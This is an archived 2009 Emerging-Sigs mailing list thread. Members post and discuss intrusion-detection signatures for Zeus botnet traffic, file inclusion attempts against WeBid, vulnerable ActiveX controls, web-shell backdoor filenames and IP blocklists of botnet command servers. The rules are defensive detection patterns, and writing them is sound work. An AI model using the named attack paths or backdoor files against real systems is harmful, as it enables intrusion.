        2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (13):
        2009301 || ET POLICY Megaupload file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009301
        2009302 || ET POLICY Badongo file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009302
        2009303 || ET POLICY MediaFire file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009303
        2009304 || ET POLICY Gigasize file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009304
        2009305 || ET TROJAN Zlob post installation checkin (.php?inst_result=&hwid) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Zlob || url,doc.emergingthreats.net/2009305 || url,www.threatexpert.com/report.aspx?md5=1ca433d3f5538fda49c5defb59232f9d
        2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From daniel.clemens at packetninjas.net  Wed May  6 21:48:06 2009
From: daniel.clemens at packetninjas.net (Daniel Clemens)
Date: Wed, 6 May 2009 20:48:06 -0500
Subject: [Emerging-Sigs] Zbot,Zues,WsPoem > v1.2.x.x Signatures
In-Reply-To: <4A01C8F1.1030206@jonkmans.com>
References: <D3FE430B-D025-4342-9820-D5CF8A8B1E66@packetninjas.net>
	<1241532428.6818.7.camel@kinta> <4A01C8F1.1030206@jonkmans.com>
Message-ID: <E57A4525-C399-4C00-9EA7-88CFAEF710F6@packetninjas.net>





On May 6, 2009, at 12:29 PM, Matt Jonkman <jonkman at jonkmans.com> wrote:

> So what's the consensus on these? Good to post or is there more info  
> we
> need on them?
>

After talking with dxp I will have to do further analysis before these  
go live :(


> Thanks by the way!
>
> Matt
>
> dxp wrote:
>> Daniel,
>>
>> I think these signatures will have many False Negatives due to the  
>> fact
>> that they will be detecting only the trojan which you've obtained
>> traffic captures from.  Zeus versions 1.2.x.x use RC4 encryption in  
>> all
>> C&C communication thus data will only match for those which use the  
>> same
>> key.
>>
>> The reason why there are similar bytes in three of the captures is  
>> due
>> to same header in all those POSTs which are encrypted with the same
>> key.  Once the key is changed, which is unique per botnet and can  
>> easily
>> change at the will of the botmaster, the signatures won't prodive  
>> detection.
>>
>> Basically, from the perspective of IDS it only sees random bytes in  
>> the
>> POST.  The only thing which is static is the minimum amount of bytes
>> which must be present for a valid record.  However, within those  
>> bytes
>> there's nothing unique.
>>
>> -
>>
>> -=[ dxp ]=-
>> 0xA3F3C6E3
>>
>>
>>
>>
>> On Tue, 2009-05-05 at 00:24 -0500, Daniel Clemens wrote:
>>>
>>> alert tcp any any -> $EXTERNAL_NET $HTTP_PORTS
>>> (msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x POST";
>>> flow:established,to_server;content:"POST";depth:5;
>>> content:"|e5 c6 80 37 55 67 da
>>> e5|";flowbits:noalert;flowbits:set,Zlob.POST;
>>> reference:url,www.packetninjas.net/?p=586;classtype:trojan-activity;sid:xxx;rev:1 
>>> ;)
>>>
>>>
>>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
>>> (msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x Server Response";
>>> flow:established,to_client;content:"|29 69 7f 1f e5 c6 80 37 5f 67  
>>> da
>>> e5 1a 21 71 4c|";
>>> content:"|d8 ee 78 25 99 7f 6f 62 09 fe 1f 6c 91 cc 52  
>>> 7b|";content:"|
>>> b0 d2 ef 20 9e 7a 34 80 14 f3 cc 3d 51 7b|";
>>> flowbits:isset,Zlob.POST;reference:url,www.packetninjas.net/?p=586;classtype:trojan-activity;sid:xxx
>>> ; rev:1;)
>>>
>>> Similarities in initial POSTS:
>>>
>>>
>>> Responses:
>>>
>>>
>>>
>>> Other links which include information about Zbot,Zues,WsPoem:
>>> http://dxp2532.blogspot.com/2009/04/zeus-zbot-prg-ntos-wsnpoem.html
>>> http://blogs.technet.com/mmpc/archive/2008/10/10/malware-writer-wants-an-eye-to-eye-with-us.aspx
>>> http://blog.s21sec.com/2009/04/when-bot-master-goes-mad-kill-os.html
>>> http://www.malwaredomainlist.com/forums/index.php?topic=2514.msg7621#msg7621
>>> http://sunbeltblog.blogspot.com/2009/01/sriurz-sez-hello-from-russia.html
>>> http://www.threatexpert.com/blog/zbot/DecodeZeusConfig.zip
>>> http://garwarner.blogspot.com/2008/11/enlisting-your-bank-to-steal-your.html
>>>
>>> Older Historical Quotes for context:
>>> Botnet-controlled Trojan robbing online bank customers
>>> Security firm says malware targeting commercial customers believed  
>>> to
>>> have come from Russia
>>> By Ellen Messmer, Network World, 12/13/07
>>>
>>> "It's been very successful since we've first seen this at the end of
>>> November," says Don Jackson, senior security researcher at  
>>> SecureWorks,
>>> which believes the Prg Trojan variant is designed by the Russian  
>>> hackers
>>> group known as Russian UpLevel working with some German affiliates.
>>>
>>> | Daniel Uriah Clemens
>>> | Packetninjas L.L.C | | http://www.packetninjas.net
>>> | c. 205.567.6850      | | o. 866.267.8851
>>> "The secret to creativity is knowing how to hide your sources"  
>>> Einstein
>>>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net <mailto:Emerging-sigs at emergingthreats.net 
>>> >
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>> --- 
>> ---------------------------------------------------------------------
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> -- 
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>

From jim.mcquaid at gmail.com  Wed May  6 23:58:56 2009
From: jim.mcquaid at gmail.com (James McQuaid)
Date: Wed, 6 May 2009 23:58:56 -0400
Subject: [Emerging-Sigs] Emerging-sigs Digest, Vol 18, Issue 7
In-Reply-To: <mailman.578.1241608882.464.emerging-sigs@emergingthreats.net>
References: <mailman.578.1241608882.464.emerging-sigs@emergingthreats.net>
Message-ID: <fe7b01530905062058p2eec095br3306598e6a9f817a@mail.gmail.com>

Hello Michael,

Thank you for pointing this out.  The bad stuff which previously
resided here has gone.  This was a reverse of
67-15-47-7.opticaljungle.com.

We are deploying a database solution.

James


> ? 1. RBN blocks blocking indian registrar mitsu.in (Michael Scheidell)


-- 
James McQuaid
http://www.jamesmcquaid.com

From signatures at stillsecure.com  Thu May  7 04:33:03 2009
From: signatures at stillsecure.com (signatures)
Date: Thu, 7 May 2009 02:33:03 -0600
Subject: [Emerging-Sigs] StillSecure: 10 New Signatures - May-07-2009
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C292D@webmail.latis.com>

Hi Matt,

Please find 10 New Signatures below:

1.        WEB-PHP WeBid cron.php include_path Parameter Local File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid cron.php include_path Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/cron.php?"; nocase; uricontent:"include_path="; nocase; content:"../"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009051; rev:1;)



2.       WEB-PHP WeBid cron.php include_path Parameter Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid cron.php include_path Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/cron.php?"; nocase; uricontent:"include_path="; nocase; pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009052; rev:1;)



3.       WEB-PHP WeBid ST_browsers.php include_path Parameter Local File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_browsers.php include_path Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_browsers.php?"; nocase; uricontent:"include_path="; nocase; content:"../"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009053; rev:1;)



4.       WEB-PHP WeBid ST_browsers.php include_path Parameter Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_browsers.php include_path Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_browsers.php?"; nocase; uricontent:"include_path="; nocase; pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009054; rev:1;)



5.       WEB-PHP WeBid ST_countries.php include_path Parameter Local File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_countries.php include_path Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_countries.php?"; nocase; uricontent:"include_path="; nocase; content:"../"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009055; rev:1;)



6.       WEB-PHP WeBid ST_countries.php include_path Parameter Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_countries.php include_path Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_countries.php?"; nocase; uricontent:"include_path="; nocase; pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009056; rev:1;)



7.       WEB-PHP WeBid ST_platforms.php include_path Parameter Local File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_platforms.php include_path Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_platforms.php?"; nocase; uricontent:"include_path="; nocase; content:"../"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009058; rev:1;)



8.       WEB-PHP WeBid ST_platforms.php include_path Parameter Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_platforms.php include_path Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_platforms.php?"; nocase; uricontent:"include_path="; nocase; pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009059; rev:1;)



9.       WEB-ATTACKS Orbit Downloader ActiveX Control Arbitrary File Delete
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Orbit Downloader ActiveX Control Arbitrary File Delete"; flow:to_client,established; content:"clsid"; nocase; content:"3F1D494B-0CEF-4468-96C9-386E2E4DEC90"; nocase; distance:0; content:"download"; nocase; classtype:web-application-attack; reference:bugtraq,34200; reference:url,milw0rm.com/exploits/8257; sid:1000062; rev:1;)



10.   WEB-ATTACKS PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite"; flow:to_client,established; content:"CLSID"; nocase; content:"6C951D10-B07F-11DB-A6ED-0050C2490048"; nocase; distance:0; pcre:"/(SaveBarCode|SaveEnhWMF)/i"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8332; reference:url,securityfocus.com/archive/1/502319; sid:2009124; rev:1;)

Looking forward for your comments, if any...

 
Thanks & Regards,
StillSecure
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090507/90cd302f/attachment-0001.html

From pepperjack at afferentsecurity.com  Thu May  7 08:43:41 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Thu, 07 May 2009 07:43:41 -0500
Subject: [Emerging-Sigs] Zbot,Zues,WsPoem > v1.2.x.x Signatures
In-Reply-To: <E57A4525-C399-4C00-9EA7-88CFAEF710F6@packetninjas.net>
References: <D3FE430B-D025-4342-9820-D5CF8A8B1E66@packetninjas.net>
	<1241532428.6818.7.camel@kinta> <4A01C8F1.1030206@jonkmans.com>
	<E57A4525-C399-4C00-9EA7-88CFAEF710F6@packetninjas.net>
Message-ID: <20090507074341.itzyfaeiw4gco4cg@mail.afferentsecurity.com>

hey I just realized an oversight on my part:

I put two rulesets for zeus on my website (in Feb), and forgot to tell  
anyone they were there. :*)

They rebuild nightly based on updates at abuse.ch
  http://www.autoshun.org/downloads/zeusIP.rules
  http://www.autoshun.org/downloads/zeusdomains.rules

jp

-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com


From jonkman at jonkmans.com  Thu May  7 11:25:31 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 07 May 2009 11:25:31 -0400
Subject: [Emerging-Sigs] StillSecure: 10 New Signatures - May-07-2009
In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C292D@webmail.latis.com>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C292D@webmail.latis.com>
Message-ID: <4A02FD6B.40201@jonkmans.com>

Added, thanks as always. Good set of sigs!

Matt

signatures wrote:
> Hi Matt,
> 
> Please find 10 New Signatures below:
> 
> 1.       * WEB-PHP WeBid cron.php include_path Parameter Local File
> Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP
> WeBid cron.php include_path Parameter Local File Inclusion";
> flow:to_server,established; content:"GET "; depth:4;
> uricontent:"/cron.php?"; nocase; uricontent:"include_path="; nocase;
> content:"../"; classtype:web-application-attack;
> reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074;
> sid:2009051; rev:1;)
> 
> 2.       *WEB-PHP WeBid cron.php include_path Parameter Remote File
> Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP
> WeBid cron.php include_path Parameter Remote File Inclusion";
> flow:to_server,established; content:"GET "; depth:4;
> uricontent:"/cron.php?"; nocase; uricontent:"include_path="; nocase;
> pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui";
> classtype:web-application-attack;
> reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074;
> sid:2009052; rev:1;)
> 
> 3.       *WEB-PHP WeBid ST_browsers.php include_path Parameter Local
> File Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP
> WeBid ST_browsers.php include_path Parameter Local File Inclusion";
> flow:to_server,established; content:"GET "; depth:4;
> uricontent:"/ST_browsers.php?"; nocase; uricontent:"include_path=";
> nocase; content:"../"; classtype:web-application-attack;
> reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074;
> sid:2009053; rev:1;)
> 
> 4.       *WEB-PHP WeBid ST_browsers.php include_path Parameter Remote
> File Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP
> WeBid ST_browsers.php include_path Parameter Remote File Inclusion";
> flow:to_server,established; content:"GET "; depth:4;
> uricontent:"/ST_browsers.php?"; nocase; uricontent:"include_path=";
> nocase; pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui";
> classtype:web-application-attack;
> reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074;
> sid:2009054; rev:1;)
> 
> 5.       *WEB-PHP WeBid ST_countries.php include_path Parameter Local
> File Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP
> WeBid ST_countries.php include_path Parameter Local File Inclusion";
> flow:to_server,established; content:"GET "; depth:4;
> uricontent:"/ST_countries.php?"; nocase; uricontent:"include_path=";
> nocase; content:"../"; classtype:web-application-attack;
> reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074;
> sid:2009055; rev:1;)
> 
> 6.       *WEB-PHP WeBid ST_countries.php include_path Parameter Remote
> File Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP
> WeBid ST_countries.php include_path Parameter Remote File Inclusion";
> flow:to_server,established; content:"GET "; depth:4;
> uricontent:"/ST_countries.php?"; nocase; uricontent:"include_path=";
> nocase; pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui";
> classtype:web-application-attack;
> reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074;
> sid:2009056; rev:1;)
> 
> 7.       *WEB-PHP WeBid ST_platforms.php include_path Parameter Local
> File Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP
> WeBid ST_platforms.php include_path Parameter Local File Inclusion";
> flow:to_server,established; content:"GET "; depth:4;
> uricontent:"/ST_platforms.php?"; nocase; uricontent:"include_path=";
> nocase; content:"../"; classtype:web-application-attack;
> reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074;
> sid:2009058; rev:1;)
> 
> 8.       *WEB-PHP WeBid ST_platforms.php include_path Parameter Remote
> File Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP
> WeBid ST_platforms.php include_path Parameter Remote File Inclusion";
> flow:to_server,established; content:"GET "; depth:4;
> uricontent:"/ST_platforms.php?"; nocase; uricontent:"include_path=";
> nocase; pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui";
> classtype:web-application-attack;
> reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074;
> sid:2009059; rev:1;)
> 
> 9.       *WEB-ATTACKS Orbit Downloader ActiveX Control Arbitrary File
> Delete*
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS
> Orbit Downloader ActiveX Control Arbitrary File Delete";
> flow:to_client,established; content:"clsid"; nocase;
> content:"3F1D494B-0CEF-4468-96C9-386E2E4DEC90"; nocase; distance:0;
> content:"download"; nocase; classtype:web-application-attack;
> reference:bugtraq,34200; reference:url,milw0rm.com/exploits/8257;
> sid:1000062; rev:1;)
> 
> 10.   *WEB-ATTACKS PrecisionID Datamatrix ActiveX control Arbitrary File
> Overwrite*
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS
> PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite";
> flow:to_client,established; content:"CLSID"; nocase;
> content:"6C951D10-B07F-11DB-A6ED-0050C2490048"; nocase; distance:0;
> pcre:"/(SaveBarCode|SaveEnhWMF)/i"; classtype:web-application-attack;
> reference:url,milw0rm.com/exploits/8332;
> reference:url,securityfocus.com/archive/1/502319; sid:2009124; rev:1;)
> 
> Looking forward for your comments, if any?
> 
>  
> Thanks & Regards,
> StillSecure
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From jonkman at jonkmans.com  Thu May  7 11:33:19 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 07 May 2009 11:33:19 -0400
Subject: [Emerging-Sigs] Emerging-sigs Digest, Vol 18, Issue 7
In-Reply-To: <fe7b01530905062058p2eec095br3306598e6a9f817a@mail.gmail.com>
References: <mailman.578.1241608882.464.emerging-sigs@emergingthreats.net>
	<fe7b01530905062058p2eec095br3306598e6a9f817a@mail.gmail.com>
Message-ID: <4A02FF3F.20804@jonkmans.com>

The ruleset has been updated. Thanks James!

matt

James McQuaid wrote:
> Hello Michael,
> 
> Thank you for pointing this out.  The bad stuff which previously
> resided here has gone.  This was a reverse of
> 67-15-47-7.opticaljungle.com.
> 
> We are deploying a database solution.
> 
> James
> 
> 
>>   1. RBN blocks blocking indian registrar mitsu.in (Michael Scheidell)
> 
> 

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From jonkman at jonkmans.com  Thu May  7 12:02:39 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 07 May 2009 12:02:39 -0400
Subject: [Emerging-Sigs] web server backdoors]
In-Reply-To: <1241640169.88470.21.camel@localhost>
References: <1241640169.88470.21.camel@localhost>
Message-ID: <4A03061F.6070909@jonkmans.com>

Sorry for the delay in posting these Jaime.

I think these have some value. There will be false positives here and
there, but for folks running web farms I think the value is obvious.

Posting now, thanks Jaime!

Matt

> Hi, I was reading this article:
> http://ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
> 
> I wrote these rules related to the article's information:
> 
> cfexec.cfm
> 
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB
> cfexec.cfm access"; flow:established,to_server; content:"GET "; depth:4;
> uricontent:"cfexec.cfm"; nocase; classtype:trojan-activity;
> reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
> 
> cmdasp.asp
> 
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB
> cmdasp.asp access"; flow:established,to_server; content:"GET "; depth:4;
> uricontent:"cmdasp.asp"; nocase; classtype:trojan-activity;
> reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
> 
> cmdasp.aspx
> 
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB
> cmdasp.aspx access"; flow:established,to_server; content:"GET ";
> depth:4; uricontent:"cmdasp.aspx"; nocase; classtype:trojan-activity;
> reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
> 
> simple-backdoor.php
> 
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB
> simple-backdoor.php access"; flow:established,to_server; content:"GET ";
> depth:4; uricontent:"simple-backdoor.php"; nocase;
> classtype:trojan-activity;
> reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
> 
> php-backdoor.php
> 
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB
> php-backdoor.php access"; flow:established,to_server; content:"GET ";
> depth:4; uricontent:"php-backdoor.php"; nocase;
> classtype:trojan-activity;
> reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
> 
> jsp-reverse.jsp
> 
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB
> jsp-reverse.jsp access"; flow:established,to_server; content:"GET ";
> depth:4; uricontent:"jsp-reverse.jsp"; nocase;
> classtype:trojan-activity;
> reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
> 
> perlcmd.cgi
> 
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB
> perlcmd.cgi access"; flow:established,to_server; content:"GET ";
> depth:4; uricontent:"perlcmd.cgi"; nocase; classtype:trojan-activity;
> reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
> 
> cmdjsp.jsp
> 
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB
> cmdjsp.jsp access"; flow:established,to_server; content:"GET "; depth:4;
> uricontent:"cmdjsp.jsp"; nocase; classtype:trojan-activity;
> reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
> 
> cmd-asp-5.1.asp
> 
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB
> cmd-asp-5.1.asp access"; flow:established,to_server; content:"GET ";
> depth:4; uricontent:"cmd-asp-5.1.asp"; nocase;
> classtype:trojan-activity;
> reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
> 
> 
> Regards
> 

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From jonkman at jonkmans.com  Thu May  7 12:32:04 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 07 May 2009 12:32:04 -0400
Subject: [Emerging-Sigs] IP Match Rulesets
Message-ID: <4A030D04.3070005@jonkmans.com>

The emerging-botcc, emerging-compromised, and emerging-rbn rulesets are
all just straight IP matching. They currently all look something like so:

alert ip $HOME_NET any -> [115.146.18.137,.....,174.129.231.136] any
(msg:"ET DROP Known Bot C&C Server Traffic (group 1) ";
reference:url,www.shadowserver.org; threshold: type limit, track by_src,
seconds 3600, count 1; classtype:trojan-activity; sid:2404000; rev:1527;)

Not that these look for IP, so they're applied to udp and tcp, as well
as icmp, etc.

Eoin Miller wrote in and says they're getting a huge performance gain by
taking these rulesets and rewriting them into tcp and udp versions.
Something like:

alert tcp $HOME_NET any -> [115.146.18.137...
alert udp $HOME_NET any -> [115.146.18.137...

Is anyone in a position where we can get a second testing of the
performance gains by doing so? If it pans out in another environment we
should consider changing these rulesets to this form.

Matt

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From phatbuckett at gmail.com  Thu May  7 13:10:05 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Thu, 7 May 2009 10:10:05 -0700
Subject: [Emerging-Sigs] Zbot,Zues,WsPoem > v1.2.x.x Signatures
In-Reply-To: <20090507074341.itzyfaeiw4gco4cg@mail.afferentsecurity.com>
References: <D3FE430B-D025-4342-9820-D5CF8A8B1E66@packetninjas.net>
	<1241532428.6818.7.camel@kinta> <4A01C8F1.1030206@jonkmans.com>
	<E57A4525-C399-4C00-9EA7-88CFAEF710F6@packetninjas.net>
	<20090507074341.itzyfaeiw4gco4cg@mail.afferentsecurity.com>
Message-ID: <839aec700905071010x7c71047ama6caf23206185ed8@mail.gmail.com>

Jack, what would you say on the prospect of scripting a set of http
rules looking for the domains on Host headers in requests? In my
environment we'll be less successful in detecting client->resolver
communications than client->server requests.

Also unimportant typo in your .rules file,

"The source URL for this   http://www.autoshun.org/downloads/zeus-domain.rules"

s/zeus-domain/zeusdomains

DS


On Thu, May 7, 2009 at 5:43 AM, Jack Pepper
<pepperjack at afferentsecurity.com> wrote:
> hey I just realized an oversight on my part:
>
> I put two rulesets for zeus on my website (in Feb), and forgot to tell
> anyone they were there. :*)
>
> They rebuild nightly based on updates at abuse.ch
> ?http://www.autoshun.org/downloads/zeusIP.rules
> ?http://www.autoshun.org/downloads/zeusdomains.rules
>
> jp
>
> --
>
> Framework? ?I don't need no stinking framework!
>
> ----------------------------------------------------------------
> @fferent Security Labs: ?Isolate/Insulate/Innovate
> http://www.afferentsecurity.com
>
> _______________________________________________
> Emerging-sigs mailing list
